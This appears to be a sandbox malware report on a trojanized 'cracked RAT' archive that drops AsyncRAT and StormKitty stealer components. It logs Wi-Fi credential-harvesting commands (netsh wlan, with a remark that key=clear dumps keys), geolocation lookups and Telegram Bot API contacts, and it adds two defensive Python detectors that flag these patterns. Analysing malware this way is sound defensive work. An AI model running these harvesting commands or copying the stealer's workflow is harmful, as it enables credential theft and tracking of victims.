| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3556 wrote to memory of 1436 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 3556 wrote to memory of 1436 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe
| MD5 | 87ca06f69c513f4fbbf67c5b4e366210 |
| SHA1 | 7a0383ddd6f8ec2ec8624358ed0cd2ddc1a366aa |
| SHA256 | 42b6ecf01da5fc49e5d12229a52ddeb9901b13d62ac00a846aa748adb083f8e5 |
| SHA512 | 286f3e8d46fe798b1e37823caea0e28811fb2e42a8e27669622a6477c353a7fe56f8e207ac9aa199df4ceac39ec9fd7bd77bdf01deac8ef448269916457d4acb |
memory/3796-232-0x0000000000FF0000-0x0000000001118000-memory.dmp
memory/3796-234-0x00007FFC2C450000-0x00007FFC2CF12000-memory.dmp
memory/3796-235-0x000000001BE00000-0x000000001BE10000-memory.dmp
memory/3796-236-0x00007FFC2C450000-0x00007FFC2CF12000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt
| MD5 | d5b77dfb5f248f3aabc560d8300088c5 |
| SHA1 | bbf7bb5f78051a59e725920cea3d54d1e7473cea |
| SHA256 | 113a6f39d02edb55049baa38c50d26579247acb7427e7494805a91e415e21a55 |
| SHA512 | 180e45da4adc3643d40ded2ff526af67361f77b6c61f05d3739e10e41327614a5f57485148f32d047f6d9169230053a77c9cc6fe5e7ced2d2dc285a7b8269552 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-20 17:22
Reported
2024-03-20 17:47
Platform
win7-20240221-en
Max time kernel
1313s
Max time network
1240s
Command Line
Signatures
AsyncRat
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| 2 matches (no indicator, process or target details captured) | N/A | N/A | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| 3 matches (no indicator, process or target details captured) | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| 2 matches (no indicator, process or target details captured) | N/A | N/A | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| 3 matches (no indicator, process or target details captured) | N/A | N/A | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | icanhazip.com | N/A | N/A |
Looks up geolocation information via web service
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TypedURLs | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob omitted) | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted) | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
Note: CABD2A79A1076A31F21D253635CB039D4329A5E8 is the SHA-1 thumbprint of ISRG Root X1 and DAC9024F54D8F6DF94935FB1732638CA6AD77C13 that of DST Root CA X3, the two Let's Encrypt roots. Together with the plain-HTTP fetch from apps.identrust.com in the Network section, this is the footprint of Windows' automatic root-certificate update, which CryptoAPI performs inside whichever process opened a TLS connection whose chain needs a root the Win7 image does not yet hold. Treat this signature as a false positive here; a malware-installed root would show a non-public CA thumbprint and would not need the IdenTrust download.
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe"
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe"
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C4A6.tmp\C4A7.tmp\C4B8.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
ServerRegistrationManager.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
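The last two cmd.exe chains above are the Wi-Fi harvesting step of the stealer: `netsh wlan show profile` enumerates saved wireless profiles (with `key=clear` it also dumps the PSKs), and `netsh wlan show networks mode=bssid` collects nearby access points, which is the input for a BSSID-based geolocation lookup (the api.mylnikov.org request in the Network section). The `chcp 65001 &&` prefix and the `.bat` launched from nested `*.tmp` directories under %TEMP% are the other two command-line shapes worth a rule. The detector below is an added example, not sandbox output: its events are constructed to mirror the Processes list, and the pid/ppid values are made up because the report does not show the process tree.

```python
"""Flag Wi-Fi harvesting and batch-wrapper command lines in process-creation events."""
import re

# (rule name, compiled pattern). Command lines are lower-cased and
# whitespace-normalised before matching.
RULES = [
    # Saved Wi-Fi profile enumeration (ATT&CK T1016.002, Wi-Fi Discovery).
    ("wifi_profile_enum", re.compile(r"netsh\s+wlan\s+show\s+profiles?\b")),
    # Nearby BSSID survey, the input for Wi-Fi based geolocation (ATT&CK T1614).
    ("wifi_bssid_survey", re.compile(r"netsh\s+wlan\s+show\s+networks\s+mode=bssid")),
    # Batch file run from nested *.tmp directories under %TEMP%: an executable
    # that unpacked an embedded .bat and handed it to cmd.exe.
    ("temp_batch_wrapper", re.compile(r'\\appdata\\local\\temp\\[^\\\s"]+\.tmp\\[^"\s]*\.bat\b')),
]

# Constructed events modelled on the report's Processes section; pids are made up.
SAMPLE_EVENTS = [
    {"pid": 4001, "ppid": 4000, "image": r"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe",
     "cmdline": r'"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"'},
    {"pid": 4002, "ppid": 4001, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C4A6.tmp\C4A7.tmp\C4B8.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""'},
    {"pid": 4003, "ppid": 4010, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All'},
    {"pid": 4004, "ppid": 4003, "image": r"C:\Windows\SysWOW64\netsh.exe",
     "cmdline": "netsh wlan show profile"},
    {"pid": 4005, "ppid": 4010, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid'},
    {"pid": 4006, "ppid": 4020, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"'},
]


def normalise(cmdline):
    """Collapse whitespace and lower-case so patterns stay simple."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def match_rules(event):
    """Names of every rule whose pattern matches the event's command line."""
    cmd = normalise(event["cmdline"])
    return [name for name, pat in RULES if pat.search(cmd)]


def detect(events):
    """Per-event rule hits plus a correlated verdict over the whole batch.

    The profile enumeration and the BSSID survey fired from the same parent
    within one capture is the pair that feeds a Wi-Fi credential dump and a
    geolocation lookup; either alone is routine administration.
    """
    hits = []
    for ev in events:
        for name in match_rules(ev):
            hits.append({"pid": ev["pid"], "ppid": ev["ppid"],
                         "image": ev["image"], "rule": name})
    by_parent = {}
    for h in hits:
        by_parent.setdefault(h["ppid"], set()).add(h["rule"])
    wifi_pair = any({"wifi_profile_enum", "wifi_bssid_survey"} <= rules
                    for rules in by_parent.values())
    return {"hits": hits, "rules_fired": {h["rule"] for h in hits},
            "wifi_harvest_pair": wifi_pair}


if __name__ == "__main__":
    result = detect(SAMPLE_EVENTS)
    for h in result["hits"]:
        print(f"pid={h['pid']:<5} ppid={h['ppid']:<5} {h['rule']:20} {h['image']}")
    print("wifi harvest pair:", result["wifi_harvest_pair"])
```

The 7-Zip launch of the archive (`cmd /c "...rar"`) matches nothing, which is the point of anchoring the batch rule on the nested `.tmp\...\.bat` path rather than on cmd.exe alone.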
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | icanhazip.com | udp |
| US | 104.16.185.241:80 | icanhazip.com | tcp |
| US | 8.8.8.8:53 | api.mylnikov.org | udp |
| US | 104.21.44.66:443 | api.mylnikov.org | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:7707 | | tcp |
| N/A | 127.0.0.1:8808 | | tcp |
| N/A | 127.0.0.1:6606 | | tcp |
Loopback connections recorded: 127.0.0.1:7707 x76, 127.0.0.1:8808 x67, 127.0.0.1:6606 x66 (209 in total, no domain resolved).
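Two things in the Network table are worth reading together. The external lookups are the stealer's profiling and exfiltration set: ip-api.com and icanhazip.com return the external IP and geolocation, api.mylnikov.org resolves BSSIDs to a location, and api.telegram.org is the Telegram Bot API that StormKitty-derived stealers use as their reporting channel. The loopback rows hit ports 6606, 7707 and 8808, the three ports AsyncRAT ships with in its default settings; a client connecting to them on 127.0.0.1 is what it looks like when a panel build and its stub are detonated on the same host. The script below is an added example, not sandbox output: it parses rows in the report's own layout, tolerates the shifted loopback rows (protocol in the Domain column) and the final row that lacks its closing cell, collapses repeats into counts and flags the AsyncRAT default ports. The sample rows are constructed from the table above.

```python
"""Summarise a sandbox Network table: collapse repeats, flag AsyncRAT default ports."""
from collections import Counter
from ipaddress import ip_address

# The ports AsyncRAT's default configuration listens on.
ASYNCRAT_DEFAULT_PORTS = {6606, 7707, 8808}

# Reference roles for the domains in this report (what each endpoint is used for).
DOMAIN_ROLES = {
    "ip-api.com": "external IP / geolocation lookup",
    "icanhazip.com": "external IP lookup",
    "api.mylnikov.org": "Wi-Fi BSSID geolocation",
    "api.telegram.org": "Telegram Bot API (stealer reporting channel)",
    "apps.identrust.com": "certificate chain building (AIA/CRL)",
}

# Constructed from the report's table; covers both cell layouts it contains.
SAMPLE_ROWS = [
    "| Country | Destination | Domain | Proto |",
    "| US | 8.8.8.8:53 | ip-api.com | udp |",
    "| US | 104.16.185.241:80 | icanhazip.com | tcp |",
    "| US | 104.21.44.66:443 | api.mylnikov.org | tcp |",
    "| NL | 149.154.167.220:443 | api.telegram.org | tcp |",
    "| NL | 149.154.167.220:443 | api.telegram.org | tcp |",
    "| N/A | 127.0.0.1:7707 | tcp | |",
    "| N/A | 127.0.0.1:7707 | tcp | |",
    "| N/A | 127.0.0.1:8808 | tcp | |",
    "| N/A | 127.0.0.1:6606 | tcp |",
]


def parse_row(line):
    """Parse one table row; returns None for the header or blank lines."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if not cells or cells[0] in ("", "Country"):
        return None
    cells += [""] * (4 - len(cells))          # pad a row missing its last cell
    country, dest, domain, proto = cells[:4]
    if domain.lower() in ("tcp", "udp") and not proto:
        domain, proto = "", domain            # shifted loopback layout
    host, _, port = dest.rpartition(":")
    if not port.isdigit():
        return None
    return {"country": country, "ip": host, "port": int(port),
            "domain": domain, "proto": proto.lower()}


def summarise(lines):
    """Group rows by (ip, port, proto), split loopback from external, flag ports."""
    rows = [r for r in (parse_row(l) for l in lines) if r]
    counts = Counter((r["ip"], r["port"], r["proto"]) for r in rows)
    loopback, external = {}, {}
    for key, n in counts.items():
        ip, port, _ = key
        entry = {"count": n, "asyncrat_default_port": port in ASYNCRAT_DEFAULT_PORTS}
        (loopback if ip_address(ip).is_loopback else external)[key] = entry
    domains = sorted({r["domain"] for r in rows if r["domain"]})
    return {
        "total_rows": len(rows),
        "loopback": loopback,
        "external": external,
        "domains": domains,
        "domain_roles": {d: DOMAIN_ROLES.get(d, "unknown") for d in domains},
    }


if __name__ == "__main__":
    s = summarise(SAMPLE_ROWS)
    for (ip, port, proto), e in sorted(s["loopback"].items()):
        flag = " (AsyncRAT default port)" if e["asyncrat_default_port"] else ""
        print(f"{ip}:{port}/{proto} x{e['count']}{flag}")
    for d, role in s["domain_roles"].items():
        print(f"{d:20} {role}")
```

Run against the full 209 loopback rows the collapse gives the three counts shown in the table; the same parser applied to a report with an external destination on 6606/7707/8808 would flag a real C2 listener rather than a local one.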
Files
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Dlls\cgeoip.dll
| MD5 | 6d6e172e7965d1250a4a6f8a0513aa9f |
| SHA1 | b0fd4f64e837f48682874251c93258ee2cbcad2b |
| SHA256 | d1ddd15e9c727a5ecf78d3918c17aee0512f5b181ad44952686beb89146e6bd0 |
| SHA512 | 35daa38ad009599145aa241102bcd1f69b4caa55ebc5bb11df0a06567056c0ec5fcd02a33576c54c670755a6384e0229fd2f96622f12304dec58f79e1e834155 |
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Dlls\protobuf-net.dll
| MD5 | 9fbb8cec55b2115c00c0ba386c37ce62 |
| SHA1 | e2378a1c22c35e40fd1c3e19066de4e33b50f24a |
| SHA256 | 9f01d9f2ed07e630ec078efa5d760762c3c8ad3b06e9e8a9062a37d63d57b026 |
| SHA512 | da0211d1c9ba0a59616bc15de80a1fed62b0405cad3b11ae4220ef1488c7837634aad67cbc8b484621a2a6288ef5e424cd816a2523bdb6167abcab76f3ac1a04 |
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Dlls\vestris.resourcelib.dll
| MD5 | 944ce5123c94c66a50376e7b37e3a6a6 |
| SHA1 | a1936ac79c987a5ba47ca3d023f740401f73529b |
| SHA256 | 7da3f0e77c4dddc82df7c16c8c781fade599b7c91e3d32eefbce215b8f06b12a |
| SHA512 | 4c034ff51cc01567f3cb0796575528ca44623b864eb606266bcf955a9259ed26b20bec0086d79038158d3a5af2ada0a90f59d7c6aae9e545294fe77825dbe08b |
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Forms\Form4.resx
| MD5 | 0a4e049a213aef04a4b1fa145a76a752 |
| SHA1 | 3603cb74a5883c3086cb483eb5ed2a1d452fbeb1 |
| SHA256 | 203301e3afc69af0045e4c6d28920fdce85a678de2bb79f53dde11bc7df63d8f |
| SHA512 | 23ee1f3c0b8bd72f7a9c3e904f21b830d27ba5a80e77e3b08790fb7438180c9d9c287da22c84ea41cdf74aee71f1bcb187dd6ea50bdee45b88a3a5cfd7808016 |
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Forms\FormDOS.resx
| MD5 | 5c43b1a8ce131be5e8271794ec520a54 |
| SHA1 | 1d2f31f18ac0b543bab6a1f45ac2d388a6ad119a |
| SHA256 | 048b4c1bd3a6d8c36d30bab692e8b2b24c8ea7310ec7cfdbd5f73e65ec62b153 |
| SHA512 | 4ffe82161a7a1578f8d0299115362c88fd7dec77fe08ab7ca886ae97eb0b064a3d1b7f0529b4708095bef4a278018e70a730f37a147edc338e0d61d31d3f40d6 |
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormRegValueEditMultiString.resources
| MD5 | beda8bbd2a72e45431cf5dd68f7c6e61 |
| SHA1 | 18e28ada040e4c62e33d946046a9ccf66f839f0d |
| SHA256 | f9f9c2a4855d61b7c7f93e9258d0306be802ef9c8c8929186deb71ee96b06d4c |
| SHA512 | 6287bb138431c33a2dd30b7c06c979ee89f691900eb407e14465d58188d04d7697ecc68eb6d479db664ea86f35b7ce6b611834028ddbd56513003c1ca28f0899 |
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormSendFileToMemory.resources
| MD5 | fa80841e3dc9ffb31dd5d015c1030172 |
| SHA1 | aa0d9e66db2a8528edf9931fe132f18870307216 |
| SHA256 | a5b9f5ccfe8ac46a630ac1cc112d343364fa2bc4a2bec0f3911322cff174cff9 |
| SHA512 | a38cc863d3c0c8d944340cd4116f03bbdb2f1526fb40b476cd0adbd444fd1dc10790d35eaf50ea34a1083b163baa82251a5048f075651bc14e46ac4cb82897bd |
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.props
| MD5 | 3108edc3f74d08bec485f1fc0aabab5b |
| SHA1 | e1e14322ab3e69a69a7b0c9efd5b845a112320b8 |
| SHA256 | e785c6a42a443ab0b9fd7888d8d37ee280c833226d9a56e2e1840edebfa8f584 |
| SHA512 | 750609750b366cdd1efd04035c742af2127d8341a22e4ce48c378f74a85414705e168f036df26f0095a82ce09142af52fbcd8a0227cc966d9c472c2f70a1907e |
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.targets
| MD5 | 3d9ef7c4c2db6e7631832825418a9ba6 |
| SHA1 | b2ac00b06d61c8498914ea52eaedaab01fae1a21 |
| SHA256 | 6d1bba3214839a263b1c34c8668d7dc5ff2d0ee91cd4a1b01d251b7595ee94d7 |
| SHA512 | 641939c4c1b7e61c90aa8ffaf9e3ac701c669a0d58ee85706f291197bacd2717451deb0fe95b4b9bb0daa56965fcdfcfe065decfcab657ac380b132887023035 |
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe
| MD5 | 27ca366a1d5c573827ffe735774b3948 |
| SHA1 | 3c5b461746dfe30be57c9645f0f306df22934a29 |
| SHA256 | 2b0cd717c200ba50563d065367955ecf4999dc708fcf80dd9862bb7a48672fab |
| SHA512 | 23ad694861f1a74afd8dd07bbc02f92b0a5fa5ba6b27eccd48d57ff415170f2187583dded882ec2ed9d390cab527ac5c8adedb9ae0d62021272626bbce6c92ee |
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe
| MD5 | 87ca06f69c513f4fbbf67c5b4e366210 |
| SHA1 | 7a0383ddd6f8ec2ec8624358ed0cd2ddc1a366aa |
| SHA256 | 42b6ecf01da5fc49e5d12229a52ddeb9901b13d62ac00a846aa748adb083f8e5 |
| SHA512 | 286f3e8d46fe798b1e37823caea0e28811fb2e42a8e27669622a6477c353a7fe56f8e207ac9aa199df4ceac39ec9fd7bd77bdf01deac8ef448269916457d4acb |
memory/1880-1252-0x00000000013D0000-0x00000000014F8000-memory.dmp
memory/1880-1253-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp
memory/1880-1255-0x00000000004F0000-0x0000000000570000-memory.dmp
memory/1880-1256-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
| MD5 | aa2fc72b58059e5e7e9e7003ab466322 |
| SHA1 | e171576589134431baccb40d308e7dcbc776e087 |
| SHA256 | f107c0f275bd1c773e1ff2d78b60a4060b8353b02f45d3892968206fedffdf88 |
| SHA512 | 26d69ad0d3f41bf08585307595e1d670c7d7905e1f86a566a36d9b0c836d3b349a6349e1f2885d433d35bd111f95ce004ae34e81443f96b73e784db3594e3eef |
memory/2192-1259-0x000007FEF5940000-0x000007FEF632C000-memory.dmp
memory/2192-1260-0x00000000012B0000-0x0000000002374000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\Guna.UI2.dll
| MD5 | 0f07705bd42d86d77dab085c42775244 |
| SHA1 | 7e4b5c367183f4753a8d610e353c458c3def3888 |
| SHA256 | cf9b66e11506fa431849350c0cb58430a71e5ec943d2db9ef1b2e2302f299443 |
| SHA512 | 851b1a4c470ee7fe07ce5619c16fd391428585926c5b559694a9e445633ea51ec86c74a3bbf3bce39d943c4bf714dad2fd3c4a4d0703be2333541c79a2ee97f0 |
memory/2192-1261-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2192-1263-0x000000001C5C0000-0x000000001C7B2000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe
| MD5 | 604f8eb4afe0d9a9e3fb5f7981c09145 |
| SHA1 | 92d44f43b4c9fc84b99ba34c5abb3672725ecc69 |
| SHA256 | 682e2204557a05cddbaddef019cbc2eda6eaa50007f20851eadb9a33c35c458d |
| SHA512 | cf35e1559004f48ed1ffbf5b78ae19861afb8e19a9979a49294da60f0f83ef7428bd3b5d09b869c6ce556141938d0d387deb350b10c0c9ca58087d384e4d3598 |
\Users\Admin\AppData\Local\Temp\c6ef4c2b-9a55-40b4-957b-c3cb74191397\GunaDotNetRT64.dll
| MD5 | 9c43f77cb7cff27cb47ed67babe3eda5 |
| SHA1 | b0400cf68249369d21de86bd26bb84ccffd47c43 |
| SHA256 | f25b9288fe370dcfcb4823fb4e44ab88c7f5fce6e137d0dba389a3dba07d621e |
| SHA512 | cde6fb6cf8db6f9746e69e6c10214e60b3646700d70b49668a2a792e309714dd2d4c5a5241977a833a95fcde8318abcc89eb9968a5039a0b75726bbfa27125a7 |
memory/1360-1274-0x0000000000150000-0x0000000000182000-memory.dmp
memory/2192-1273-0x000007FEF28D0000-0x000007FEF29FC000-memory.dmp
memory/2192-1272-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp
memory/1360-1275-0x0000000074680000-0x0000000074D6E000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.dll
| MD5 | af527b22b92a23c38a492c5961cf2643 |
| SHA1 | 15106adfa13415287b3e9d8deba21df53cb92eda |
| SHA256 | 4208c9293c5684d2fc3c8f5a269a1120adee32fbd2766bbb73410aab2d491b7a |
| SHA512 | 543cce9b5e4c9558bf0bd0da9d6af8c1ad2f7d62e2d65a9aa4e3af9e4840ce6fb6bbe8952bd20f6f1e3a6d3b5e5e5b3417a60b6d955bfa4e23a653262677b49c |
memory/2192-1277-0x000000001D010000-0x000000001D250000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
| MD5 | 5b52658c4517684971de10a6b7a67c30 |
| SHA1 | f0820c52617ebacaf53d8b8d97f1a42c712888bd |
| SHA256 | 3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31 |
| SHA512 | ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6 |
memory/2580-1279-0x0000000000400000-0x0000000000439000-memory.dmp
memory/1360-1281-0x0000000002020000-0x0000000002060000-memory.dmp
